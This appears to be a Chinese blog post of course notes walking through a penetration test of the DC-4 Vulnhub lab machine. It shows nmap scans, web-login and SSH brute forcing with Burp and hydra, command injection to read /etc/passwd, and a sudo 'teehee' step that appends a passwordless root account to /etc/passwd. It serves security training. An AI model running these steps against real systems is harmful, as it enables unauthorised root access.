[网络安全学习篇72]:渗透测试实战-DC-4-靶机入侵

最新推荐文章于 2022-07-11 07:34:00 发布
最新推荐文章于 2022-07-11 07:34:00 发布
阅读量1.1k 收藏 14
点赞数
分类专栏: 渗透测试 千峰网络安全视频笔记篇 靶机实战 文章标签: 信息安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43252204/article/details/106307707
版权

引言:我的系列博客[网络安全学习篇]上线了,小编也是初次创作博客,经验不足;对千峰网络信息安全开源的视频公开课程的学习整理的笔记整理的也比较粗糙,其实看到目录有300多集的时候,讲道理,有点怂了,所以我就想到了通过写博客(课程笔记)的形式去学习它,虽然写博客会让我多花几倍的时间去学习它,但是当我完成一篇博客所获得的成就感和你们对于我的认同感,让我很满足,能够鼓励我一天天的坚持下去,也希望和我一起学习本期视频的"同道"们也能给一直坚持下去。我们大家一起加油。由于作者本身也是网络信息安全小白,大部分知识点都是初次接触,出现对其理解不深入,不完整,甚至也会出现错误有问题的地方,希望大家谅解、留言提出指正,同时也欢迎大家来找我一起交流学习!!!

 

往期博客:

第一阶段:

[网络安全学习篇1]:windowsxp、windows2003、windows7、windows2008系统部署(千峰网络安全视频笔记)

[网络安全学习篇24]:漏洞与木马(千峰网络安全视频笔记 p117-p118)

第二阶段:

[网络安全学习篇25]:初识Linux及简单命令

[网络安全学习篇32]:Linux脚本编写汇总及应用

第三阶段:

[网络安全学习篇33]:0基础带你入门python

[网络安全学习篇38]:基础环境搭建

[网络安全学习篇39]:HTML标签基础 常用的标签 表格

[网络安全学习篇42]:靶场环境搭建(ubuntu系统安装优化及vulhub安装)

[网络安全学习篇43]:PHP基础+变量 运算符 流程控制语句

[网络安全学习篇48]:JS 基础 函数 事件

第四阶段:

[网络安全学习篇49]:渗透测试方法论

[网络安全学习篇50]:Web架构安全分析

[网络安全学习篇51]:信息收集

[网络安全学习篇52]:扫描技术

[网络安全学习篇53]:口令破解

[网络安全学习篇54]:SQL注入

[网络安全学习篇55]:SQL自动化注入

[网络安全学习篇56]:XSS

[网络安全学习篇57]:XSS(二)

[网络安全学习篇58]:PHP代码注入

[网络安全学习篇59]:OS命令注入

[网络安全学习篇60]:文件上传

[网络安全学习篇61]:文件包含

[网络安全学习篇62]:CSRF 攻击

[网络安全学习篇63]:SSRF

[网络安全学习篇64]:业务安全

[网络安全学习篇65]:提权

[网络安全学习篇66]:Metasploit(MSF)

[网络安全学习篇67]:python poc-exp

[网络安全学习篇68]:反序列化漏洞

[网络安全学习篇69]:渗透测试实战-DC-1-靶机入侵

[网络安全学习篇70]:渗透测试实战-DC-2-靶机入侵

[网络安全学习篇71]:渗透测试实战-DC-3-靶机入侵

[网络安全学习篇72]:渗透测试实战-DC-4-靶机入侵(本篇)

下期博文:

[网络安全学习篇73]:渗透测试实战-DC-5-靶机入侵

 

目录

 

搭建靶场环境

获取其IP地址

访问其80端口

尝试使用bp 进行密码爆破

登录网站

存在命令注入漏洞

对ssh 进行爆破

提权成功,拿到flag

搭建靶场环境

链接:https://pan.baidu.com/s/1L-fHw8bNAPHS6jHx1BJA3A 
提取码:8r7m 

启动DC-4

 

获取其IP地址

 

nmap -sP 192.168.1.2/24

 

nmap -A 192.168.1.167 -p 1-65535 -oN nmap.A

 

访问其80端口

 

尝试使用bp 进行密码爆破

我们猜测其用户名很可能是admin,对admin用户密码进行爆破

 

添加密码字典

设置线程500

 

爆破成功,得到其密码happy

 

登录网站

使用[admin/happy]登录成功

 

我们发现可以执行一些系统命令

 

通过抓包,观察

 

存在命令注入漏洞

 

查看passwd 文件

 

依次查看各用户的家目录,在jim用户的家目录下发现旧的密码备份文件

 

将这些密码复制到kali 创建密码字典

vim old_passwd.bak

 

创建用户名字典

vim user.dic

charles

jim

sam

 

对ssh 进行爆破

hydra -L user.dic -P old_passwd.bak ssh://192.168.1.167 -vV -o hydra.ssh

 

得到账密[jim/jibril04]

尝试使用ssh 登录

ssh jim@192.168.1.167

成功连接

 

cd /var/mail

cat jim

 

尝试使用[charles/^xHhA&hvim0y]登录

 

查看可以不需要密码就可以使用root权限执行的命令

sudo -l

 

teehee -help

查看帮助信息,这条命令可以在文件的最后追加命令

 

在psaawd 文件末尾追加

sudo teehee -a /etc/passwd

GGG::0:0:::/bin/bash

 

提权成功,拿到flag

参考文献:

千峰网络信息安全开源课程

beglage
关注
专栏目录
[网络安全自学] 六十八.WannaCry勒索病毒复现及分析(二)MS17-010利用及病毒解析
杨秀璋的专栏
04-20 1万+
这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步。前文分享了通过Python利用永恒之蓝漏洞加载WannaCry勒索病毒,并实现对Win7文件加密的过程,但过程较为复杂,为什么不直接利用永恒之蓝呢?所以,这文章将直接分享MSF利用MS17-010漏洞进行反弹Shell,再上传勒索病毒进行实验复现,并详细讲解WannaCry勒索病毒的原理。基础性文章,希望对您有所帮助。
[网络安全自学] 六十七.WannaCry勒索病毒复现及分析(一)Python利用永恒之蓝及Win7勒索加密
杨秀璋的专栏
04-14 1万+
这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步。前文分享了Vulnhub靶机渗透的DC-1题目,通过信息收集、CMS漏洞搜索、Drupal漏洞利用、Metasploit反弹shell、提权及数据库爆破获取flag。这文章将分享新知识,最近WannaRen勒索软件爆发(下图是安天的分析攻击流程),其名称和功能与WannaCry相似,所以接下来作者将连续分享WannaCry勒索病毒的复现及分析,希望这基础性文章对您有所帮助。
渗透测试实战4——Node靶机入侵
浅浅的博客
04-25 1343
一、实验环境 攻击机(Kali):192.168.247.149 靶机(Node):192.168.247.152 二、实验步骤 一)主动信息收集 1、主机发现 2、端口扫描 3、端口版本信息 扫描结果发现靶机开启了22 ssh端口和3000端口,且3000端口开放的是http服务。 二)端口探测 端口3000(http服务) 1、探测目录 因为htt...
066 渗透测试实战靶机 DC-4
鸡蛋炒鸡蛋
04-29 439
文章目录一:环境准备 一:环境准备 下载:点我 下载之后完成安装,过程详情请参考,063 渗透测试实战靶机 DC-1 打开DC-4
渗透测试实战DC-1 靶场入侵
蚁景网安学院
03-20 504
Background Informationvulnhub 地址:https://www.vulnhub.com/entry/dc-1-1,292/There are multiple ...
[网络安全学习71]:渗透测试实战-DC-3-靶机入侵
安全知识学习-该平台为唯一原作者平台,其他平台属冒名顶替,请勿相信上当受骗
05-22 2294
搭建靶机环境 获取其IP地址 Nmap 指纹识别 joomscan扫描 查找网站模板joomla 3.7.0存在的漏洞 sqlmap 列出数据库库名 列出当前数据库的库名 列出joomladb 数据库的库名 列出users 表的字段及类型 列出账密 解密 进入后台 上传木马 反弹shell 提权
Vulnhub靶机渗透测试DC-4靶机渗透实战
御七彩虹猫
10-09 1489
写了WP在个人博客 https://www.takagisan.top/index.php/2021/10/09/vulnhub%e9%9d%b6%e6%9c%ba%e6%b8%97%e9%80%8f%e6%b5%8b%e8%af%95-dc-4%e9%9d%b6%e6%9c%ba%e6%b8%97%e9%80%8f%e5%ae%9e%e6%88%98/
渗透测试 ( 2 ) --- 渗透测试系统、靶机、GoogleHacking、kali工具
墨鱼菜鸡
07-11 2375
操作系统:https://zhuanlan.zhihu.com/p/162865015 1、基于 Windows、Linux、Android 的渗透测试系统 1.1 基于 Linux 的系统 Kali:https://www.kali.org/get-kali/Parrot Security OS:Parrot Securitybackbox:ht...
渗透测试 ( 5 ) --- 扫描之王 nmap、渗透测试工具实战技巧合集
墨鱼菜鸡
07-11 5748
Nmap 官方文档 ( 中文文档是 Nmap 版本4.50,英文文档是最新的): 英文文档:https://nmap.org/book/man.html中文文档:https://nmap.org/man/zh/index.html#man-description官方 Nmap 项目指南:https://nmap.org/book/toc.html ...
[网络安全自学] 七十一.深信服分享之外部威胁防护和勒索病毒对抗
热门推荐
杨秀璋的专栏
04-29 1万+
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步。前面三文章详细分享了WannaCry勒索病毒,包括病毒复现、IDA和OD逆向分析蠕虫传播、防护措施等,那么如何防护呢?所以,接下来这文章作者将分享来自深信服老师的《外部威胁防护和勒索病毒对抗》,带领大家看看知名安全厂商的威胁防护措施,包括网络安全面临的挑战、如何有效的应对挑战、深信服安全建设之道等。基础性文章,希望对您有所帮助,如果存在错误或不足之处,还望告知,加油!
渗透DC-4靶机实战笔记
qq_43571759的博客
03-30 439
渗透DC-4靶机实战笔记 试验环境: 靶机环境:DC-4 攻击机:kali 扫描同网段存活主机、开放端口,寻找突破点; 存活主机IP地址是192.168.11.140 扫描其主机信息和开放端口号,开放了22号端口可以考虑爆破。 也开放80号端口,web服务器是nginx1.15 访问是这样的,大概知道渗透这个靶机是考验我们的爆破技术了吧,这里习惯性的先尝试了一下弱口令不成功,这里我准备在虚拟机...
靶机实战-DC-4
滕财然的博客
02-26 314
DC-4靶机实战 文章目录DC-4靶机实战1、主机发现2、端口及端口详细信息扫描3、访问web服务(80端口)4、提权 这个靶机一开始扫不到IP,改一下虚拟机设置,然后重启就ok了 1、主机发现 目标IP为:192.168.232.168 2、端口及端口详细信息扫描 发现目标开放22、80端口 3、访问web服务(80端口) 只有一个登录框,没有验证码,尝试弱口令 弱口令无果,用bp爆破: ...
DC-4靶机渗透
qq_56805195的博客
07-07 1067
第一次写文章,请各位大佬指教
数据安全靶机
k0sec的安全路
07-03 534
1’ order by 1# 1’ order by 2# 1’ order by 3# //报错,所以order by猜解得到的列数为2,判断字段数为2 判断回显点,有两个回显点 1’ union select 1,2# 查询当前数据库版本,查询当前数据库名 1’ union select version(),database()# 查询当前数据库 表名 1’ union select 1,ta...
网络空间安全——攻防对抗 2.0
Jay
05-19 1万+
网络空间安全——攻防对抗 2 信息收集,使用kali,扫描己方靶机端口 21端口的ftp的攻击 ftp攻击方式,查看本机有哪些普通用户 admin/123456和guest/123456 然后提交flag 22端口的ssh攻击 使用session –I查看已经获取到的连接 使用session –I序号 获取连接 23 telnet的攻击方式 防御21-2...
网络安全-靶机环境搭建
Chaoer
06-21 783
靶机环境搭建1.1.1 LAMP介绍LAMP是Linux下Apache、MySQL和PHP的应用环境。Linux + Apache + MySQL + PHP平台:Apache Http Server:web服务器软件MySQL:关系型数据库管理系统PHP:通用开源脚本语言1.1.2 LAMP安装配置安装 Apache 服务:sudo yum install httpd -y开启 Apache 服务:sudo systemctl start httpd。服务开启后用浏览器访问 localhost,如果能看到
网络安全-靶机pikachu之xss注入与代码分析(XSStrike实战
关注网络安全、云原生安全
10-27 5844
本文使用靶机pikachu,来练习一下工具XSStrike 常用命令 -u url --skip 跳过确认提示 --skip-dom 跳过dom型扫描 --data post型时的数据 更多内容查看:网络安全-XSStrike中文手册(自学笔记) 反射型XSS(get) 输入kobe 正常 可以看到,是get型,页面返回正常 攻击 python xsstrike.py -u "http://127.0.0.1/pikachu/vul/xss/xss_reflected_get.p
靶机渗透测试实战(八)——Billu_creat_Files渗透实战
橘子女侠
05-11 2881
目录 一. 实验环境 二. 实验流程 三. 实验步骤 (一)信息收集——主机发现 1. 查看Kali的IP信息;(IP:192.168.37.131) 2. 扫描主机(netdiscover) (二)信息收集——端口扫描 1. 扫描端口(masscan) 2. 详细扫描端口信息(nmap) (三)渗透测试 80端口(http服务) 1. 访问目标靶机的80端口 ...
[网络安全学习75]:渗透测试实战-DC-7-靶机入侵
安全知识学习-该平台为唯一原作者平台,其他平台属冒名顶替,请勿相信上当受骗
05-25 1386
引言:我的系列博客[网络安全学习]上线了,小编也是初次创作博客,经验不足;对千峰网络信息安全开源的视频公开课程的学习整理的笔记整理的也比较粗糙,其实看到目录有300多集的时候,讲道理,有点怂了,所以我就想到了通过写博客(课程笔记)的形式去学习它,虽然写博客会让我多花几倍的时间去学习它,但是当我完成一博客所获得的成就感和你们对于我的认同感,让我很满足,能够鼓励我一天天的坚持下去,也希望和我一起学习本期视频的"同道"们也能给一直坚持下去。我们大家一起加油。由于作者本身也是网络信息安全小白,大部分知识点都是初
"渗透测试靶机学习:lampiao靶机准备与扫描攻击实战
渗透测试靶机学习过程中,首先需要准备针对特定靶机的环境。本次学习的目标是lampiao靶机,其下载地址为https://download.vulnhub.com/lampiao/Lampiao.zip。考虑到下载速度的问题,也可以选择使用种子文件进行...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

beglage

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值